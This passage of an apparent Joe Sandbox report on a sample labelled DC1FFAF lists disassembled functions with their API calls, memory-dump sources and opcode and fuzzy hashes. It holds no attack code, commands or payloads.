                                                                                                                                      • Opcode ID: b31aeb8dd3c5ff2fe154ca1ae1770a6d799e0aac6d438c6b34975bef5d7c6603
                                                                                                                                      • Instruction ID: bd09af1ace2d6c22cc4503aae16eb27caf849940d28e5019d6acf370c63cbdc8
                                                                                                                                      • Opcode Fuzzy Hash: b31aeb8dd3c5ff2fe154ca1ae1770a6d799e0aac6d438c6b34975bef5d7c6603
                                                                                                                                      • Instruction Fuzzy Hash: 99210AB4A00209AFDB04DF99D891FAF77B5BF48308F10852AF909AB345D778E911CB95
                                                                                                                                      Function 00437890 Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 004378BE
                                                                                                                                        • Part of subcall function 00432A40: _memset.LIBCMT ref: 00432A65
                                                                                                                                        • Part of subcall function 00442060: _memset.LIBCMT ref: 00442071
                                                                                                                                      • SendMessageA.USER32(?,00000030,00547B10,00000000), ref: 00437947
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2497471678-0
                                                                                                                                      • Opcode ID: 99ca3eb26ae008e7b402ab74a4204ce3229353499c0392936bdaacf7c3b3d42d
                                                                                                                                      • Instruction ID: 4ca277e53d17deed16c010d03abe768dc556f4adecba50cca5e87c165366e354
                                                                                                                                      • Opcode Fuzzy Hash: 99ca3eb26ae008e7b402ab74a4204ce3229353499c0392936bdaacf7c3b3d42d
                                                                                                                                      • Instruction Fuzzy Hash: F3215471A4020CABDB28DF54DC52FEA7778AB4C704F40459DB7099B281DAB4AE81CBA5
                                                                                                                                      Function 69EBF38F Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EC2DCA: __getptd_noexit.LIBCMT ref: 69EC2DCA
                                                                                                                                        • Part of subcall function 69EC24F4: __decode_pointer.LIBCMT ref: 69EC24FF
                                                                                                                                      • __lock_file.LIBCMT ref: 69EBF3DF
                                                                                                                                        • Part of subcall function 69EC9D3F: __lock.LIBCMT ref: 69EC9D64
                                                                                                                                      • __fclose_nolock.LIBCMT ref: 69EBF3E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 717694121-0
                                                                                                                                      • Opcode ID: bc247975bc170331aba0e57556900b1c6d8ce2836481745cf204cb6ad18d5fec
                                                                                                                                      • Instruction ID: 290beb82b8a378662d2c80759ca33aa066438bebc96b7c2abe930d3e1d60d359
                                                                                                                                      • Opcode Fuzzy Hash: bc247975bc170331aba0e57556900b1c6d8ce2836481745cf204cb6ad18d5fec
                                                                                                                                      • Instruction Fuzzy Hash: 3DF0C27C804605DAC310EB6D8E0065E7EA0AF41378F30EB0DD0B9AB2D5CB7C4603AA56
                                                                                                                                      Function 00469B80 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 4611c19157e45ef07c557d7108ac69e23fa0d4d64db0481c37cb6cd8b1b7dba5
                                                                                                                                      • Instruction ID: 3f193f4935509f3a8bece472e2e3aa06f5934c330827a62894933e6baaa14e24
                                                                                                                                      • Opcode Fuzzy Hash: 4611c19157e45ef07c557d7108ac69e23fa0d4d64db0481c37cb6cd8b1b7dba5
                                                                                                                                      • Instruction Fuzzy Hash: 44F0627090020C97DF54E7A0EC43BD977AC6F54708F4041A9AA08A62C1FAB85F458B96
                                                                                                                                      Function 69E873D0 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E89080: _strrchr.LIBCMT ref: 69E89097
                                                                                                                                      • DeleteFileA.KERNEL32(?,?,?,69E8184E,?), ref: 69E873FF
                                                                                                                                      • GetLastError.KERNEL32(?,?,69E8184E,?), ref: 69E87405
                                                                                                                                        • Part of subcall function 69E85EF0: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,69E873EF,?,?,69E8184E,?), ref: 69E85F05
                                                                                                                                        • Part of subcall function 69E85EF0: GetFileSize.KERNEL32(00000000,?,?,69E873EF,?,?,69E8184E,?), ref: 69E85F1B
                                                                                                                                        • Part of subcall function 69E85EF0: CloseHandle.KERNEL32(00000000,?,69E873EF,?,?,69E8184E,?), ref: 69E85F3D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateDeleteErrorHandleLastSize_strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 364315698-0
                                                                                                                                      • Opcode ID: 8921d8081d692894f5c500d81277e5501991548357f84b65a7547049880bb1f4
                                                                                                                                      • Instruction ID: a5f943ebbabaa2fc68d046be3a018cf55d180150888646b791535eb382a36efb
                                                                                                                                      • Opcode Fuzzy Hash: 8921d8081d692894f5c500d81277e5501991548357f84b65a7547049880bb1f4
                                                                                                                                      • Instruction Fuzzy Hash: EDE06532F5512147D72262B9BB0424EA676DF812B8B355065F80DEB360EF65CC4281D1
                                                                                                                                      Function 69EBEE7F Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 69EBEE8B
                                                                                                                                        • Part of subcall function 69EC7833: __getptd_noexit.LIBCMT ref: 69EC7836
                                                                                                                                        • Part of subcall function 69EC7833: __amsg_exit.LIBCMT ref: 69EC7843
                                                                                                                                        • Part of subcall function 69EBEE36: __IsNonwritableInCurrentImage.LIBCMT ref: 69EBEE45
                                                                                                                                        • Part of subcall function 69EBEE36: __getptd_noexit.LIBCMT ref: 69EBEE55
                                                                                                                                        • Part of subcall function 69EBEE36: CloseHandle.KERNEL32(?,?,69EBEEA0), ref: 69EBEE69
                                                                                                                                        • Part of subcall function 69EBEE36: __freeptd.LIBCMT ref: 69EBEE70
                                                                                                                                        • Part of subcall function 69EBEE36: ExitThread.KERNEL32 ref: 69EBEE78
                                                                                                                                      • __XcptFilter.LIBCMT ref: 69EBEEAC
                                                                                                                                        • Part of subcall function 69EC8C6E: __getptd_noexit.LIBCMT ref: 69EC8C76
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __getptd_noexit$CloseCurrentExitFilterHandleImageNonwritableThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3737419996-0
                                                                                                                                      • Opcode ID: f48047be0428e21236944a1c2474c0817487d04f0c2364732ad1872adbc6badc
                                                                                                                                      • Instruction ID: 6b364b70c2345a2027b462b9b6e3d44dec6900f7e8e8f08f8df384910307d393
                                                                                                                                      • Opcode Fuzzy Hash: f48047be0428e21236944a1c2474c0817487d04f0c2364732ad1872adbc6badc
                                                                                                                                      • Instruction Fuzzy Hash: 6AE0EC79505601EFD718DBA0CB44E6D7761EF04215F70508DE1526B2A1CF35AD40DA12
                                                                                                                                      Function 00498AA3 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00498AAF
                                                                                                                                        • Part of subcall function 0049FD91: __amsg_exit.LIBCMT ref: 0049FDA1
                                                                                                                                        • Part of subcall function 00498A5A: __IsNonwritableInCurrentImage.LIBCMT ref: 00498A69
                                                                                                                                        • Part of subcall function 00498A5A: CloseHandle.KERNEL32(?,?,00498AC4), ref: 00498A8D
                                                                                                                                        • Part of subcall function 00498A5A: __freeptd.LIBCMT ref: 00498A94
                                                                                                                                        • Part of subcall function 00498A5A: RtlExitUserThread.NTDLL(00000000,00000000,?,00498AC4), ref: 00498A9D
                                                                                                                                        • Part of subcall function 00498A5A: __XcptFilter.LIBCMT ref: 00498AD0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCurrentExitFilterHandleImageNonwritableThreadUserXcpt__amsg_exit__freeptd__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 285482719-0
                                                                                                                                      • Opcode ID: 5caa8bc75f6555de2272c01bb9872203b798e2831e6c4907b32d2a82fabcf705
                                                                                                                                      • Instruction ID: b6dcdbffa47efe72578e82bd285f406b6092434a4ca06ba229fa4b9372bef3e2
                                                                                                                                      • Opcode Fuzzy Hash: 5caa8bc75f6555de2272c01bb9872203b798e2831e6c4907b32d2a82fabcf705
                                                                                                                                      • Instruction Fuzzy Hash: 9BE08670500600DFEB18ABA1C402E6D3F25EF04305F20005EF1025B2A1CF7999809A14
                                                                                                                                      Function 0049C3F3 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 0049C3FF
                                                                                                                                        • Part of subcall function 0049FD91: __amsg_exit.LIBCMT ref: 0049FDA1
                                                                                                                                        • Part of subcall function 0049C3B6: __IsNonwritableInCurrentImage.LIBCMT ref: 0049C3C9
                                                                                                                                        • Part of subcall function 0049C3B6: __freeptd.LIBCMT ref: 0049C3E3
                                                                                                                                        • Part of subcall function 0049C3B6: __XcptFilter.LIBCMT ref: 0049C420
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentFilterImageNonwritableXcpt__amsg_exit__freeptd__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 326234442-0
                                                                                                                                      • Opcode ID: 8c483163dbfac3b561efd183c4a7bd32e63bbd93f7411f411b110229088b3b4c
                                                                                                                                      • Instruction ID: c5f0196b20eb0cf5c2067f715c49f503ba94fd98a8548637a41da7eee0cb0a3e
                                                                                                                                      • Opcode Fuzzy Hash: 8c483163dbfac3b561efd183c4a7bd32e63bbd93f7411f411b110229088b3b4c
                                                                                                                                      • Instruction Fuzzy Hash: B9E0E6B1500600AFDB18EBA5C946E7E7B75EF44305F10405EF5025B2A2CA7999449B14
                                                                                                                                      Function 69ECC350 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 69ECC368
                                                                                                                                        • Part of subcall function 69EC7D5D: __mtinitlocknum.LIBCMT ref: 69EC7D73
                                                                                                                                        • Part of subcall function 69EC7D5D: __amsg_exit.LIBCMT ref: 69EC7D7F
                                                                                                                                        • Part of subcall function 69EC7D5D: EnterCriticalSection.KERNEL32(?,?,?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001), ref: 69EC7D87
                                                                                                                                      • __tzset_nolock.LIBCMT ref: 69ECC379
                                                                                                                                        • Part of subcall function 69ECBC3B: __lock.LIBCMT ref: 69ECBC5D
                                                                                                                                        • Part of subcall function 69ECBC3B: __get_daylight.LIBCMT ref: 69ECBC72
                                                                                                                                        • Part of subcall function 69ECBC3B: __invoke_watson.LIBCMT ref: 69ECBC81
                                                                                                                                        • Part of subcall function 69ECBC3B: __get_daylight.LIBCMT ref: 69ECBC8D
                                                                                                                                        • Part of subcall function 69ECBC3B: __invoke_watson.LIBCMT ref: 69ECBC9C
                                                                                                                                        • Part of subcall function 69ECBC3B: __get_daylight.LIBCMT ref: 69ECBCA8
                                                                                                                                        • Part of subcall function 69ECBC3B: __invoke_watson.LIBCMT ref: 69ECBCB7
                                                                                                                                        • Part of subcall function 69ECBC3B: ____lc_codepage_func.LIBCMT ref: 69ECBCBF
                                                                                                                                        • Part of subcall function 69ECBC3B: __getenv_helper_nolock.LIBCMT ref: 69ECBCE1
                                                                                                                                        • Part of subcall function 69ECBC3B: _strlen.LIBCMT ref: 69ECBD1F
                                                                                                                                        • Part of subcall function 69ECBC3B: __malloc_crt.LIBCMT ref: 69ECBD26
                                                                                                                                        • Part of subcall function 69ECBC3B: _strlen.LIBCMT ref: 69ECBD3C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __get_daylight__invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4157481694-0
                                                                                                                                      • Opcode ID: 820d6774ff40300754867899795dfb4398f6c72b3f646fa07470b74e78caf0b5
                                                                                                                                      • Instruction ID: 9f4ca08014ba2037f670b045f70ce792e160eced5940b19ee0111cdab0a4f9aa
                                                                                                                                      • Opcode Fuzzy Hash: 820d6774ff40300754867899795dfb4398f6c72b3f646fa07470b74e78caf0b5
                                                                                                                                      • Instruction Fuzzy Hash: 9AE086B8D46F50D6CB12DBA46306A0C76307B56725F71D24ED4F4192C1CB300102CA57
                                                                                                                                      Function 0046D510 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 43500b9ae7dab68019d58c6417fd0958774c152c1733b6ae3f55b740e1047d9e
                                                                                                                                      • Instruction ID: ce016d1164cd296fba7696b3f99d8ea73e8403713d5487fa768adc614e808023
                                                                                                                                      • Opcode Fuzzy Hash: 43500b9ae7dab68019d58c6417fd0958774c152c1733b6ae3f55b740e1047d9e
                                                                                                                                      • Instruction Fuzzy Hash: 4A51C5B4E01218DFDB24CF54C984B99B7F5AB48308F6081EAE6096B381D7749F85CF99
                                                                                                                                      Function 0048542B Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3_catch
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886170330-0
                                                                                                                                      • Opcode ID: daa7abe2a3ba4e2f06bb196cb1e1c91dcfb89c5d49dc62472e052aeb24116834
                                                                                                                                      • Instruction ID: 93308841e22296547eb288ca6e9fdb5d7d509dba6a260cfde6237209896fcd50
                                                                                                                                      • Opcode Fuzzy Hash: daa7abe2a3ba4e2f06bb196cb1e1c91dcfb89c5d49dc62472e052aeb24116834
                                                                                                                                      • Instruction Fuzzy Hash: 74418D3060060AEFCF12EFA5C940DAE7BB2FF08704F11485AF90AAA260C735CE50DB55
                                                                                                                                      Function 00406670 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00406630: allocator.LIBCPMTD ref: 0040663C
                                                                                                                                      • allocator.LIBCPMTD ref: 00406718
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: allocator
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3447690668-0
                                                                                                                                      • Opcode ID: 2915e64b76a9dbdbc84378ed2b054ce8a412a80f962ca1346407236a8a5acec4
                                                                                                                                      • Instruction ID: 80fd112cc351b0432446d58de0a029309112cde00b0514ca1811865421c4efff
                                                                                                                                      • Opcode Fuzzy Hash: 2915e64b76a9dbdbc84378ed2b054ce8a412a80f962ca1346407236a8a5acec4
                                                                                                                                      • Instruction Fuzzy Hash: 7741FCB5E002099FCB04DF99C881AAFB7B5FF48314F20812AE916B7381D739A941CBD4
                                                                                                                                      Function 0044FA90 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 0044FAE9
                                                                                                                                        • Part of subcall function 0044EFA0: _memset.LIBCMT ref: 0044EFE0
                                                                                                                                        • Part of subcall function 0044EFA0: _memset.LIBCMT ref: 0044F03B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 39280fdb76ccd2f706fdedb6d6d50e729e343f3ad363a65ed1892703f3831987
                                                                                                                                      • Instruction ID: 53dd2aaa02b63c4ee38874a704c12b6987aae1b9876d4c09e22dd165a3cdbed1
                                                                                                                                      • Opcode Fuzzy Hash: 39280fdb76ccd2f706fdedb6d6d50e729e343f3ad363a65ed1892703f3831987
                                                                                                                                      • Instruction Fuzzy Hash: B04149B0D002189BDF04DF98D851BEEB7F5BF88304F148169E408A7341E779AA49CFA5
                                                                                                                                      Function 00427C70 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 0224285fadf37917a97207ee9a77a49909025003a582e0211a11c53c3520e247
                                                                                                                                      • Instruction ID: c372d0c0acc0190ccb6e556d72efd6b4e24a53ae4a75cc90938f453a48fb826c
                                                                                                                                      • Opcode Fuzzy Hash: 0224285fadf37917a97207ee9a77a49909025003a582e0211a11c53c3520e247
                                                                                                                                      • Instruction Fuzzy Hash: 0D31A374A44318AFEB50EF60DC46BE97774EB59708F80859DE1046B1C1EBF81A88CB95
                                                                                                                                      Function 004646C0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 168ec0a5052d3cf080cb6f8ea065936f4dc0923b5facaa9ded2caa83aa03ab80
                                                                                                                                      • Instruction ID: e599d4b5d59e613b8daa17a35b9ade275dd241a2b4149dfd9ba56c428ea653df
                                                                                                                                      • Opcode Fuzzy Hash: 168ec0a5052d3cf080cb6f8ea065936f4dc0923b5facaa9ded2caa83aa03ab80
                                                                                                                                      • Instruction Fuzzy Hash: D22194B5D00208ABDF10DF90DC49BDE77B8AB54308F0044AEE50997381FB789B84CB96
                                                                                                                                      Function 00471C36 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00471C3D
